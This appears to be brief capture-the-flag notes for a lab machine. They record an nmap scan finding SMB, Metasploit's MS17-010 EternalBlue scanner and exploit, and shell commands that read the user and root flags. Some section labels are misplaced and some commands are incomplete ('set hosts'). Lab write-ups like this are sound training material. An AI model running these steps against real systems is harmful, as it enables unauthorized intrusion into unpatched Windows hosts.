RECON

Nmap Scan

nmap –p- -A -T4 10.10.10.40

-allports -version -Aggressive

Port 139 and 445 shows SMB is running

Google-Fu

Windows 7 Professional 7601 Service Pack 1

MS17-010 EternalBlue

Metasploit Search

msfconsole

search eternal blue

Auxiliary Scan

use 3

set host

run

Host is likely Vulnerbale

ENUMERATION

Eternal Blue Exploit

use 0

set hosts

run

Success

PRIVILEGE ESCALATION

Directories

shell

cd C:/

cd Users

dir

User Flag

cd haris

cd Desktop

dir

type user.txt

Root Flag

cd C:/Users/Administrator

cd Desktop

dir

type root.txt